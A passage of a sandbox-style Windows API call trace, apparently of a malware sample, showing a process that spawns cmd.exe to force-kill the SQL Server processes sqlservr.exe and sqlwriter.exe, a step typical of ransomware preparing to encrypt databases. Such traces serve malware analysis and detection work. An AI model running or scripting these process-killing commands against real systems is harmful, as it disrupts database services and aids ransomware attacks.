dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x134 [0149.450] GetConsoleMode (in: hConsoleHandle=0x134, lpMode=0x123a3a80 | out: lpMode=0x123a3a80) returned 0 [0149.450] CreateFileW (lpFileName="NUL" (normalized: "\\device\\null"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0149.450] GetConsoleMode (in: hConsoleHandle=0x138, lpMode=0x123a3a80 | out: lpMode=0x123a3a80) returned 0 [0149.450] GetEnvironmentStringsW () returned 0x8ea900* [0149.450] FreeEnvironmentStringsW (penv=0x8ea900) returned 1 [0149.451] GetCurrentProcess () returned 0xffffffff [0149.451] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x130, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x1234ecb0, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0x1234ecb0*=0x13c) returned 1 [0149.451] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x134, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x1234ecb4, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0x1234ecb4*=0x140) returned 1 [0149.451] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x138, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x1234ecb8, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0x1234ecb8*=0x144) returned 1 [0149.451] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="cmd.exe /c \"taskkill /f /im sqlservr.exe \"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x400, lpEnvironment=0x12419500, lpCurrentDirectory=0x0, lpStartupInfo=0x123a3aa4*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x13c, hStdOutput=0x140, hStdError=0x144), lpProcessInformation=0x123a3a80 | out: lpCommandLine="cmd.exe /c \"taskkill /f /im sqlservr.exe \"", lpProcessInformation=0x123a3a80*(hProcess=0x158, hThread=0x154, dwProcessId=0xf88, dwThreadId=0xe44)) returned 1 [0149.548] SetEvent (hEvent=0x150) returned 1 [0149.548] CloseHandle (hObject=0x154) returned 1 [0149.548] CloseHandle (hObject=0x144) returned 1 [0149.548] CloseHandle (hObject=0x140) returned 1 [0149.548] CloseHandle (hObject=0x13c) returned 1 [0149.548] CloseHandle (hObject=0x130) returned 1 [0149.548] CloseHandle (hObject=0x134) returned 1 [0149.549] CloseHandle (hObject=0x138) returned 1 [0149.549] WaitForSingleObject (hHandle=0x158, dwMilliseconds=0xffffffff) returned 0x0 [0151.331] SetEvent (hEvent=0x150) returned 1 [0151.331] GetExitCodeProcess (in: hProcess=0x158, lpExitCode=0x123a3bb4 | out: lpExitCode=0x123a3bb4*=0x80) returned 1 [0151.331] GetProcessTimes (in: hProcess=0x158, lpCreationTime=0x1234d540, lpExitTime=0x1234d548, lpKernelTime=0x1234d550, lpUserTime=0x1234d558 | out: lpCreationTime=0x1234d540, lpExitTime=0x1234d548, lpKernelTime=0x1234d550, lpUserTime=0x1234d558) returned 1 [0151.331] CloseHandle (hObject=0x158) returned 1 [0151.331] SetEvent (hEvent=0x128) returned 1 [0151.331] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0x5) returned 0x102 [0151.374] SetEvent (hEvent=0x128) returned 1 [0151.374] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x123ba9c0, nSize=0x64 | out: lpBuffer="") returned 0x35 [0151.374] GetFileAttributesExW (in: lpFileName="cmd.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe"), fInfoLevelId=0x0, lpFileInformation=0x123b11d8 | out: lpFileInformation=0x123b11d8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0151.375] CreateFileW (lpFileName="cmd.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0151.375] GetFileAttributesExW (in: lpFileName="cmd.exe.com" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.com"), fInfoLevelId=0x0, lpFileInformation=0x123b1228 | out: lpFileInformation=0x123b1228*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0151.375] CreateFileW (lpFileName="cmd.exe.com" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.com"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0151.375] GetFileAttributesExW (in: lpFileName="cmd.exe.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.exe"), fInfoLevelId=0x0, lpFileInformation=0x123b1278 | out: lpFileInformation=0x123b1278*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0151.375] CreateFileW (lpFileName="cmd.exe.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.exe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0151.375] GetFileAttributesExW (in: lpFileName="cmd.exe.bat" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.bat"), fInfoLevelId=0x0, lpFileInformation=0x123b12c8 | out: lpFileInformation=0x123b12c8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0151.375] CreateFileW (lpFileName="cmd.exe.bat" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.bat"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0151.375] GetFileAttributesExW (in: lpFileName="cmd.exe.cmd" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.cmd"), fInfoLevelId=0x0, lpFileInformation=0x123b1318 | out: lpFileInformation=0x123b1318*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0151.376] CreateFileW (lpFileName="cmd.exe.cmd" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.cmd"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0151.376] GetFileAttributesExW (in: lpFileName="cmd.exe.vbs" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbs"), fInfoLevelId=0x0, lpFileInformation=0x123b1368 | out: lpFileInformation=0x123b1368*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0151.376] CreateFileW (lpFileName="cmd.exe.vbs" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbs"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0151.376] GetFileAttributesExW (in: lpFileName="cmd.exe.vbe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbe"), fInfoLevelId=0x0, lpFileInformation=0x123b13b8 | out: lpFileInformation=0x123b13b8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0151.376] CreateFileW (lpFileName="cmd.exe.vbe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0151.376] GetFileAttributesExW (in: lpFileName="cmd.exe.js" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.js"), fInfoLevelId=0x0, lpFileInformation=0x123b1408 | out: lpFileInformation=0x123b1408*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0151.376] CreateFileW (lpFileName="cmd.exe.js" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.js"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0151.376] GetFileAttributesExW (in: lpFileName="cmd.exe.jse" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.jse"), fInfoLevelId=0x0, lpFileInformation=0x123b1458 | out: lpFileInformation=0x123b1458*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0151.377] CreateFileW (lpFileName="cmd.exe.jse" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.jse"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0151.377] GetFileAttributesExW (in: lpFileName="cmd.exe.wsf" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsf"), fInfoLevelId=0x0, lpFileInformation=0x123b14a8 | out: lpFileInformation=0x123b14a8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0151.377] CreateFileW (lpFileName="cmd.exe.wsf" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsf"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0151.377] GetFileAttributesExW (in: lpFileName="cmd.exe.wsh" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsh"), fInfoLevelId=0x0, lpFileInformation=0x123b14f8 | out: lpFileInformation=0x123b14f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0151.377] CreateFileW (lpFileName="cmd.exe.wsh" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsh"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0151.377] GetFileAttributesExW (in: lpFileName="cmd.exe.msc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.msc"), fInfoLevelId=0x0, lpFileInformation=0x123b1548 | out: lpFileInformation=0x123b1548*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0151.377] CreateFileW (lpFileName="cmd.exe.msc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.msc"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0151.377] GetEnvironmentVariableW (in: lpName="path", lpBuffer=0x123baa90, nSize=0x64 | out: lpBuffer="") returned 0x63 [0151.378] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe"), fInfoLevelId=0x0, lpFileInformation=0x123b1598 | out: lpFileInformation=0x123b1598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2aa5d0fd, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2aa5d0fd, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2aa5d0fd, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x31600)) returned 1 [0151.378] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x123bab60, nSize=0x64 | out: lpBuffer="") returned 0x35 [0151.378] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe"), fInfoLevelId=0x0, lpFileInformation=0x123b15e8 | out: lpFileInformation=0x123b15e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2aa5d0fd, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2aa5d0fd, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2aa5d0fd, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x31600)) returned 1 [0151.378] CreateFileW (lpFileName="NUL" (normalized: "\\device\\null"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0151.378] GetConsoleMode (in: hConsoleHandle=0x158, lpMode=0x123a3a7c | out: lpMode=0x123a3a7c) returned 0 [0151.379] CreateFileW (lpFileName="NUL" (normalized: "\\device\\null"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0151.379] GetConsoleMode (in: hConsoleHandle=0x138, lpMode=0x123a3a80 | out: lpMode=0x123a3a80) returned 0 [0151.379] CreateFileW (lpFileName="NUL" (normalized: "\\device\\null"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x134 [0151.379] GetConsoleMode (in: hConsoleHandle=0x134, lpMode=0x123a3a80 | out: lpMode=0x123a3a80) returned 0 [0151.379] GetEnvironmentStringsW () returned 0x8ea900* [0151.379] FreeEnvironmentStringsW (penv=0x8ea900) returned 1 [0151.380] GetCurrentProcess () returned 0xffffffff [0151.380] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x158, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x123935e0, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0x123935e0*=0x130) returned 1 [0151.380] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x138, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x123935e4, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0x123935e4*=0x13c) returned 1 [0151.380] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x134, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x123935e8, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0x123935e8*=0x140) returned 1 [0151.381] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="cmd.exe /c \"taskkill /f /im sqlwriter.exe \"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x400, lpEnvironment=0x12420a80, lpCurrentDirectory=0x0, lpStartupInfo=0x123a3aa4*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x130, hStdOutput=0x13c, hStdError=0x140), lpProcessInformation=0x123a3a80 | out: lpCommandLine="cmd.exe /c \"taskkill /f /im sqlwriter.exe \"", lpProcessInformation=0x123a3a80*(hProcess=0x154, hThread=0x144, dwProcessId=0x12bc, dwThreadId=0x12c4)) returned 1 [0151.679] SetEvent (hEvent=0x150) returned 1 [0151.679] CloseHandle (hObject=0x144) returned 1 [0151.679] CloseHandle (hObject=0x140) returned 1 [0151.679] CloseHandle (hObject=0x13c) returned 1 [0151.679] CloseHandle (hObject=0x130) returned 1 [0151.679] CloseHandle (hObject=0x158) returned 1 [0151.679] CloseHandle (hObject=0x138) returned 1 [0151.679] CloseHandle (hObject=0x134) returned 1 [0151.679] WaitForSingleObject (hHandle=0x154, dwMilliseconds=0xffffffff) returned 0x0 [0153.203] SetEvent (hEvent=0x150) returned 1 [0153.203] GetExitCodeProcess (in: hProcess=0x154, lpExitCode=0x123a3bb4 | out: lpExitCode=0x123a3bb4*=0x80) returned 1 [0153.203] GetProcessTimes (in: hProcess=0x154, lpCreationTime=0x12422220, lpExitTime=0x12422228, lpKernelTime=0x12422230, lpUserTime=0x12422238 | out: lpCreationTime=0x12422220, lpExitTime=0x12422228, lpKernelTime=0x12422230, lpUserTime=0x12422238) returned 1 [0153.203] CloseHandle (hObject=0x154) returned 1 [0153.203] SetEvent (hEvent=0x128) returned 1 [0153.204] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0x4) returned 0x102 [0153.243] SetEvent (hEvent=0x150) returned 1 [0153.243] SetEvent (hEvent=0x128) returned 1 [0153.244] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x123e8750, nSize=0x64 | out: lpBuffer="") returned 0x35 [0153.244] GetFileAttributesExW (in: lpFileName="cmd.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe"), fInfoLevelId=0x0, lpFileInformation=0x123f0d28 | out: lpFileInformation=0x123f0d28*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0153.244] CreateFileW (lpFileName="cmd.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0153.244] GetFileAttributesExW (in: lpFileName="cmd.exe.com" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.com"), fInfoLevelId=0x0, lpFileInformation=0x123f0d78 | out: lpFileInformation=0x123f0d78*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0153.244] CreateFileW (lpFileName="cmd.exe.com" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.com"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0153.244] GetFileAttributesExW (in: lpFileName="cmd.exe.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.exe"), fInfoLevelId=0x0, lpFileInformation=0x123f0dc8 | out: lpFileInformation=0x123f0dc8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0153.244] CreateFileW (lpFileName="cmd.exe.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.exe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0153.245] GetFileAttributesExW (in: lpFileName="cmd.exe.bat" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.bat"), fInfoLevelId=0x0, lpFileInformation=0x123f0e18 | out: lpFileInformation=0x123f0e18*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0153.245] CreateFileW (lpFileName="cmd.exe.bat" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.bat"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0153.245] GetFileAttributesExW (in: lpFileName="cmd.exe.cmd" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.cmd"), fInfoLevelId=0x0, lpFileInformation=0x123f0e68 | out: lpFileInformation=0x123f0e68*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0153.245] CreateFileW (lpFileName="cmd.exe.cmd" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.cmd"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0153.245] GetFileAttributesExW (in: lpFileName="cmd.exe.vbs" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbs"), fInfoLevelId=0x0, lpFileInformation=0x123f0eb8 | out: lpFileInformation=0x123f0eb8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0153.245] CreateFileW (lpFileName="cmd.exe.vbs" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbs"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0153.245] GetFileAttributesExW (in: lpFileName="cmd.exe.vbe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbe"), fInfoLevelId=0x0, lpFileInformation=0x123f0f08 | out: lpFileInformation=0x123f0f08*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0153.245] CreateFileW (lpFileName="cmd.exe.vbe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0153.245] GetFileAttributesExW (in: lpFileName="cmd.exe.js" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.js"), fInfoLevelId=0x0, lpFileInformation=0x123f0f58 | out: lpFileInformation=0x123f0f58*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0153.245] CreateFileW (lpFileName="cmd.exe.js" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.js"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0153.245] GetFileAttributesExW (in: lpFileName="cmd.exe.jse" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.jse"), fInfoLevelId=0x0, lpFileInformation=0x123f0fa8 | out: lpFileInformation=0x123f0fa8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0153.245] CreateFileW (lpFileName="cmd.exe.jse" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.jse"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 